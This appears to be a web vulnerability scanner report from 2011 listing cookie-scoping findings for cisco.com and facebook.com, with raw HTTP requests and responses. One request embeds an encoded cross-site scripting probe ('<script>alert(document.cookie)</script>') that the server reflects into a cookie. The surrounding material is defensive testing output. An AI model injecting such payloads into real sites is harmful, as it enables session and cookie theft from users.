HTTP/1.1 200 OK Server: Apache/2.0 Cache-Control: max-age=0 Expires: Sat, 05 Feb 2011 21:53:45 GMT CDCHOST: ccows-sj-101 Content-Type: text/html Date: Sat, 05 Feb 2011 21:53:45 GMT Content-Length: 1295 Connection: close Set-Cookie: CP_GUTC=72.163.4.167.1296942825278234; path=/; expires=Wed, 30-Jan-36 21:53:45 GMT; domain=.cisco.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /warp/public/707/newsflash.html HTTP/1.1 Host: www.cisco.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Apache/2.0 Cache-Control: max-age=0 Expires: Sat, 05 Feb 2011 21:52:59 GMT CDCHOST: ccows-sj-202 Content-Type: text/html Date: Sat, 05 Feb 2011 21:53:45 GMT Content-Length: 1444 Connection: close Set-Cookie: CP_GUTC=72.163.4.169.1296942779477277; path=/; expires=Wed, 30-Jan-36 21:52:59 GMT; domain=.cisco.com
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /web/about/ac123/ac147/archived_issues/ipj_9-1/ip_addresses.html HTTP/1.1 Host: www.cisco.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The following cookie was issued by the application and is scoped to a parent of the issuing domain:
lsd=_8zhn; path=/; domain=.facebook.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: www.facebook.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: datr=8CJHTYhjyotVYfKpZ5B35lnF; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dehow.com%26placement%3Dactivity%26extra_1%3Dhttp%253A%252F%252Fwww.ehow.com%252F%26extra_2%3DUS;
Response
HTTP/1.1 200 OK Cache-Control: private, no-cache, no-store, must-revalidate Expires: Sat, 01 Jan 2000 00:00:00 GMT P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p" Pragma: no-cache Set-Cookie: lsd=_8zhn; path=/; domain=.facebook.com Content-Type: text/html; charset=utf-8 Connection: close Date: Sat, 05 Feb 2011 23:01:46 GMT Content-Length: 30973
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class= ...[SNIP]...
The following cookie was issued by the application and is scoped to a parent of the issuing domain:
lsd=V6SJp; path=/; domain=.facebook.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /BlackBerry HTTP/1.1 Host: www.facebook.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: datr=8CJHTYhjyotVYfKpZ5B35lnF; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dehow.com%26placement%3Dactivity%26extra_1%3Dhttp%253A%252F%252Fwww.ehow.com%252F%26extra_2%3DUS;
Response
HTTP/1.1 200 OK Cache-Control: private, no-cache, no-store, must-revalidate Expires: Sat, 01 Jan 2000 00:00:00 GMT P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p" Pragma: no-cache Set-Cookie: lsd=V6SJp; path=/; domain=.facebook.com Content-Type: text/html; charset=utf-8 Connection: close Date: Sun, 06 Feb 2011 16:07:02 GMT Content-Length: 40227
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class= ...[SNIP]...
The following cookie was issued by the application and is scoped to a parent of the issuing domain:
lsd=udoDx; path=/; domain=.facebook.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /BlackBerryES HTTP/1.1 Host: www.facebook.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: datr=8CJHTYhjyotVYfKpZ5B35lnF; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dehow.com%26placement%3Dactivity%26extra_1%3Dhttp%253A%252F%252Fwww.ehow.com%252F%26extra_2%3DUS;
Response
HTTP/1.1 200 OK Cache-Control: private, no-cache, no-store, must-revalidate Expires: Sat, 01 Jan 2000 00:00:00 GMT P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p" Pragma: no-cache Set-Cookie: lsd=udoDx; path=/; domain=.facebook.com Content-Type: text/html; charset=utf-8 Connection: close Date: Sun, 06 Feb 2011 16:07:03 GMT Content-Length: 166974
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class= ...[SNIP]...
The following cookie was issued by the application and is scoped to a parent of the issuing domain:
lsd=4IO1b; path=/; domain=.facebook.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /BlackBerryFR HTTP/1.1 Host: www.facebook.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: datr=8CJHTYhjyotVYfKpZ5B35lnF; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dehow.com%26placement%3Dactivity%26extra_1%3Dhttp%253A%252F%252Fwww.ehow.com%252F%26extra_2%3DUS;
Response
HTTP/1.1 200 OK Cache-Control: private, no-cache, no-store, must-revalidate Expires: Sat, 01 Jan 2000 00:00:00 GMT P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p" Pragma: no-cache Set-Cookie: lsd=4IO1b; path=/; domain=.facebook.com Content-Type: text/html; charset=utf-8 Connection: close Date: Sun, 06 Feb 2011 16:07:04 GMT Content-Length: 309302
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class= ...[SNIP]...
The following cookie was issued by the application and is scoped to a parent of the issuing domain:
lsd=5Sbol; path=/; domain=.facebook.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /BlackBerryNL HTTP/1.1 Host: www.facebook.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: datr=8CJHTYhjyotVYfKpZ5B35lnF; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dehow.com%26placement%3Dactivity%26extra_1%3Dhttp%253A%252F%252Fwww.ehow.com%252F%26extra_2%3DUS;
Response
HTTP/1.1 200 OK Cache-Control: private, no-cache, no-store, must-revalidate Expires: Sat, 01 Jan 2000 00:00:00 GMT P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p" Pragma: no-cache Set-Cookie: lsd=5Sbol; path=/; domain=.facebook.com Content-Type: text/html; charset=utf-8 Connection: close Date: Sun, 06 Feb 2011 16:07:04 GMT Content-Length: 176442
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class= ...[SNIP]...
The following cookie was issued by the application and is scoped to a parent of the issuing domain:
lsd=UTyVw; path=/; domain=.facebook.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /BlackBerryUK HTTP/1.1 Host: www.facebook.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: datr=8CJHTYhjyotVYfKpZ5B35lnF; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dehow.com%26placement%3Dactivity%26extra_1%3Dhttp%253A%252F%252Fwww.ehow.com%252F%26extra_2%3DUS;
Response
HTTP/1.1 200 OK Cache-Control: private, no-cache, no-store, must-revalidate Expires: Sat, 01 Jan 2000 00:00:00 GMT P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p" Pragma: no-cache Set-Cookie: lsd=UTyVw; path=/; domain=.facebook.com Content-Type: text/html; charset=utf-8 Connection: close Date: Sun, 06 Feb 2011 16:07:04 GMT Content-Length: 38791
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class= ...[SNIP]...
The following cookie was issued by the application and is scoped to a parent of the issuing domain:
lsd=jDrHM; path=/; domain=.facebook.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /BlackBerryZA HTTP/1.1 Host: www.facebook.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: datr=8CJHTYhjyotVYfKpZ5B35lnF; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dehow.com%26placement%3Dactivity%26extra_1%3Dhttp%253A%252F%252Fwww.ehow.com%252F%26extra_2%3DUS;
Response
HTTP/1.1 200 OK Cache-Control: private, no-cache, no-store, must-revalidate Expires: Sat, 01 Jan 2000 00:00:00 GMT P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p" Pragma: no-cache Set-Cookie: lsd=jDrHM; path=/; domain=.facebook.com Content-Type: text/html; charset=utf-8 Connection: close Date: Sun, 06 Feb 2011 16:07:06 GMT Content-Length: 190060
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class= ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /Craig.Marshall.Deutschland HTTP/1.1 Host: www.facebook.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: datr=8CJHTYhjyotVYfKpZ5B35lnF; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dehow.com%26placement%3Dactivity%26extra_1%3Dhttp%253A%252F%252Fwww.ehow.com%252F%26extra_2%3DUS;
Response
HTTP/1.1 200 OK Cache-Control: private, no-cache, no-store, must-revalidate Expires: Sat, 01 Jan 2000 00:00:00 GMT P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p" Pragma: no-cache Set-Cookie: lsd=N7QZT; path=/; domain=.facebook.com Set-Cookie: reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2FCraig.Marshall.Deutschland; path=/; domain=.facebook.com Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2FCraig.Marshall.Deutschland; path=/; domain=.facebook.com Content-Type: text/html; charset=utf-8 Connection: close Date: Sun, 06 Feb 2011 16:07:06 GMT Content-Length: 21873
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class= ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /ajouli1 HTTP/1.1 Host: www.facebook.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: datr=8CJHTYhjyotVYfKpZ5B35lnF; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dehow.com%26placement%3Dactivity%26extra_1%3Dhttp%253A%252F%252Fwww.ehow.com%252F%26extra_2%3DUS;
Response
HTTP/1.1 200 OK Cache-Control: private, no-cache, no-store, must-revalidate Expires: Sat, 01 Jan 2000 00:00:00 GMT P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p" Pragma: no-cache Set-Cookie: lsd=RGY-U; path=/; domain=.facebook.com Set-Cookie: reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fajouli1; path=/; domain=.facebook.com Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fajouli1; path=/; domain=.facebook.com Content-Type: text/html; charset=utf-8 Connection: close Date: Sun, 06 Feb 2011 16:07:02 GMT Content-Length: 17726
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class= ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /americanexpress HTTP/1.1 Host: www.facebook.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private, no-cache, no-store, must-revalidate Expires: Sat, 01 Jan 2000 00:00:00 GMT P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p" Pragma: no-cache Set-Cookie: datr=JMlNTQiqK0xyt0kGBu374Lk2; expires=Mon, 04-Feb-2013 22:03:16 GMT; path=/; domain=.facebook.com; httponly Set-Cookie: lsd=si0H1; path=/; domain=.facebook.com Content-Type: text/html; charset=utf-8 Connection: close Date: Sat, 05 Feb 2011 22:03:17 GMT Content-Length: 37259
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class= ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /campaign/impression.php?campaign_id=137675572948107&partner_id=us.blackberry.com&placement=like_box&extra_1=http%3A%2F%2Fus.blackberry.com%2Fsmartphones%2F94178%2522%253E%253Cscript%253Ealert%28document.cookie%29%253C%2Fscript%253Ed0d62204af5%2F&extra_2=US HTTP/1.1 Host: www.facebook.com Proxy-Connection: keep-alive Referer: http://www.facebook.com/plugins/likebox.php?id=13004060847&width=292&connections=10&stream=true&header=false&height=455 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dehow.com%26placement%3Dactivity%26extra_1%3Dhttp%253A%252F%252Fwww.ehow.com%252F%26extra_2%3DUS; datr=8CJHTYhjyotVYfKpZ5B35lnF
Response
HTTP/1.1 200 OK Cache-Control: private, no-cache, no-store, must-revalidate Content-Length: 43 Content-Type: image/gif Expires: Sat, 01 Jan 2000 00:00:00 GMT P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p" Pragma: no-cache Set-Cookie: campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dus.blackberry.com%26placement%3Dlike_box%26extra_1%3Dhttp%253A%252F%252Fus.blackberry.com%252Fsmartphones%252F94178%252522%25253E%25253Cscript%25253Ealert%2528document.cookie%2529%25253C%252Fscript%25253Ed0d62204af5%252F%26extra_2%3DUS; expires=Tue, 08-Mar-2011 13:32:56 GMT; path=/; domain=.facebook.com; httponly X-Cnection: close Date: Sun, 06 Feb 2011 13:32:56 GMT
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /campaign/landing.php HTTP/1.1 Host: www.facebook.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: datr=8CJHTYhjyotVYfKpZ5B35lnF; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dehow.com%26placement%3Dactivity%26extra_1%3Dhttp%253A%252F%252Fwww.ehow.com%252F%26extra_2%3DUS;
Response
HTTP/1.1 302 Found Location: http://www.facebook.com/ P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p" Set-Cookie: campaign_click_url=%2Fcampaign%2Flanding.php; expires=Mon, 07-Mar-2011 22:38:41 GMT; path=/; domain=.facebook.com; httponly Content-Type: text/html; charset=utf-8 Connection: close Date: Sat, 05 Feb 2011 22:38:41 GMT Content-Length: 0
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /dcmoncayo HTTP/1.1 Host: www.facebook.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: datr=8CJHTYhjyotVYfKpZ5B35lnF; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dehow.com%26placement%3Dactivity%26extra_1%3Dhttp%253A%252F%252Fwww.ehow.com%252F%26extra_2%3DUS;
Response
HTTP/1.1 200 OK Cache-Control: private, no-cache, no-store, must-revalidate Expires: Sat, 01 Jan 2000 00:00:00 GMT P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p" Pragma: no-cache Set-Cookie: lsd=0C9sx; path=/; domain=.facebook.com Set-Cookie: reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fdcmoncayo; path=/; domain=.facebook.com Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fdcmoncayo; path=/; domain=.facebook.com Content-Type: text/html; charset=utf-8 Connection: close Date: Sun, 06 Feb 2011 16:07:06 GMT Content-Length: 22952
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class= ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /fabianomorige HTTP/1.1 Host: www.facebook.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: datr=8CJHTYhjyotVYfKpZ5B35lnF; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dehow.com%26placement%3Dactivity%26extra_1%3Dhttp%253A%252F%252Fwww.ehow.com%252F%26extra_2%3DUS;
Response
HTTP/1.1 200 OK Cache-Control: private, no-cache, no-store, must-revalidate Expires: Sat, 01 Jan 2000 00:00:00 GMT P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p" Pragma: no-cache Set-Cookie: lsd=pH6X0; path=/; domain=.facebook.com Set-Cookie: reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Ffabianomorige; path=/; domain=.facebook.com Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Ffabianomorige; path=/; domain=.facebook.com Content-Type: text/html; charset=utf-8 Connection: close Date: Sun, 06 Feb 2011 16:07:06 GMT Content-Length: 22768
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class= ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /laprincesita.inigulable HTTP/1.1 Host: www.facebook.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: datr=8CJHTYhjyotVYfKpZ5B35lnF; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dehow.com%26placement%3Dactivity%26extra_1%3Dhttp%253A%252F%252Fwww.ehow.com%252F%26extra_2%3DUS;
Response
HTTP/1.1 200 OK Cache-Control: private, no-cache, no-store, must-revalidate Expires: Sat, 01 Jan 2000 00:00:00 GMT P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p" Pragma: no-cache Set-Cookie: lsd=mjsdQ; path=/; domain=.facebook.com Set-Cookie: reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Flaprincesita.inigulable; path=/; domain=.facebook.com Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Flaprincesita.inigulable; path=/; domain=.facebook.com Content-Type: text/html; charset=utf-8 Connection: close Date: Sun, 06 Feb 2011 16:07:07 GMT Content-Length: 23661
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class= ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /marytere.medina HTTP/1.1 Host: www.facebook.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: datr=8CJHTYhjyotVYfKpZ5B35lnF; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dehow.com%26placement%3Dactivity%26extra_1%3Dhttp%253A%252F%252Fwww.ehow.com%252F%26extra_2%3DUS;
Response
HTTP/1.1 200 OK Cache-Control: private, no-cache, no-store, must-revalidate Expires: Sat, 01 Jan 2000 00:00:00 GMT P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p" Pragma: no-cache Set-Cookie: lsd=f2GZC; path=/; domain=.facebook.com Set-Cookie: reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fmarytere.medina; path=/; domain=.facebook.com Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fmarytere.medina; path=/; domain=.facebook.com Content-Type: text/html; charset=utf-8 Connection: close Date: Sun, 06 Feb 2011 16:07:07 GMT Content-Length: 22264
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class= ...[SNIP]...
The following cookie was issued by the application and is scoped to a parent of the issuing domain:
lsd=EBuc7; path=/; domain=.facebook.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /pages/Kledyde/344540630304 HTTP/1.1 Host: www.facebook.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: datr=8CJHTYhjyotVYfKpZ5B35lnF; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dehow.com%26placement%3Dactivity%26extra_1%3Dhttp%253A%252F%252Fwww.ehow.com%252F%26extra_2%3DUS;
Response
HTTP/1.1 200 OK Cache-Control: private, no-cache, no-store, must-revalidate Expires: Sat, 01 Jan 2000 00:00:00 GMT P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p" Pragma: no-cache Set-Cookie: lsd=EBuc7; path=/; domain=.facebook.com Content-Type: text/html; charset=utf-8 Connection: close Date: Sun, 06 Feb 2011 16:07:08 GMT Content-Length: 301696
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class= ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /pages/OrthoSuperSitecom/296664256434 HTTP/1.1 Host: www.facebook.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private, no-cache, no-store, must-revalidate Expires: Sat, 01 Jan 2000 00:00:00 GMT P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p" Pragma: no-cache Set-Cookie: datr=JslNTVyi3Z1cM6bZrSjKLTPt; expires=Mon, 04-Feb-2013 22:03:18 GMT; path=/; domain=.facebook.com; httponly Set-Cookie: lsd=mxlHK; path=/; domain=.facebook.com Content-Type: text/html; charset=utf-8 Connection: close Date: Sat, 05 Feb 2011 22:03:18 GMT Content-Length: 136626
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class= ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /pages/Orthopaedic-Trauma-Association/212018968439?ref=search&sid=1357027577.2299684249..1&v=wall HTTP/1.1 Host: www.facebook.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private, no-cache, no-store, must-revalidate Expires: Sat, 01 Jan 2000 00:00:00 GMT P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p" Pragma: no-cache Set-Cookie: datr=JslNTQvcuvBm8glwbtNJrYQt; expires=Mon, 04-Feb-2013 22:03:18 GMT; path=/; domain=.facebook.com; httponly Set-Cookie: lsd=Nxr12; path=/; domain=.facebook.com Content-Type: text/html; charset=utf-8 Connection: close Date: Sat, 05 Feb 2011 22:03:18 GMT Content-Length: 143785
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class= ...[SNIP]...
The following cookie was issued by the application and is scoped to a parent of the issuing domain:
lsd=07KIU; path=/; domain=.facebook.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /pages/OwnerIQ/54446991004 HTTP/1.1 Host: www.facebook.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: datr=8CJHTYhjyotVYfKpZ5B35lnF; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dehow.com%26placement%3Dactivity%26extra_1%3Dhttp%253A%252F%252Fwww.ehow.com%252F%26extra_2%3DUS;
Response
HTTP/1.1 301 Moved Permanently Cache-Control: private, no-cache, no-store, must-revalidate Expires: Sat, 01 Jan 2000 00:00:00 GMT Location: http://www.facebook.com/OwnerIQ P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p" Pragma: no-cache Set-Cookie: lsd=07KIU; path=/; domain=.facebook.com Content-Type: text/html; charset=utf-8 Connection: close Date: Sat, 05 Feb 2011 23:01:52 GMT Content-Length: 0
The following cookie was issued by the application and is scoped to a parent of the issuing domain:
lsd=PSfaE; path=/; domain=.facebook.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /pages/Tipd/39630264367 HTTP/1.1 Host: www.facebook.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: datr=8CJHTYhjyotVYfKpZ5B35lnF; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dehow.com%26placement%3Dactivity%26extra_1%3Dhttp%253A%252F%252Fwww.ehow.com%252F%26extra_2%3DUS;
Response
HTTP/1.1 301 Moved Permanently Cache-Control: private, no-cache, no-store, must-revalidate Expires: Sat, 01 Jan 2000 00:00:00 GMT Location: http://www.facebook.com/tipddotcom P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p" Pragma: no-cache Set-Cookie: lsd=PSfaE; path=/; domain=.facebook.com Content-Type: text/html; charset=utf-8 Connection: close Date: Sun, 06 Feb 2011 16:07:08 GMT Content-Length: 0
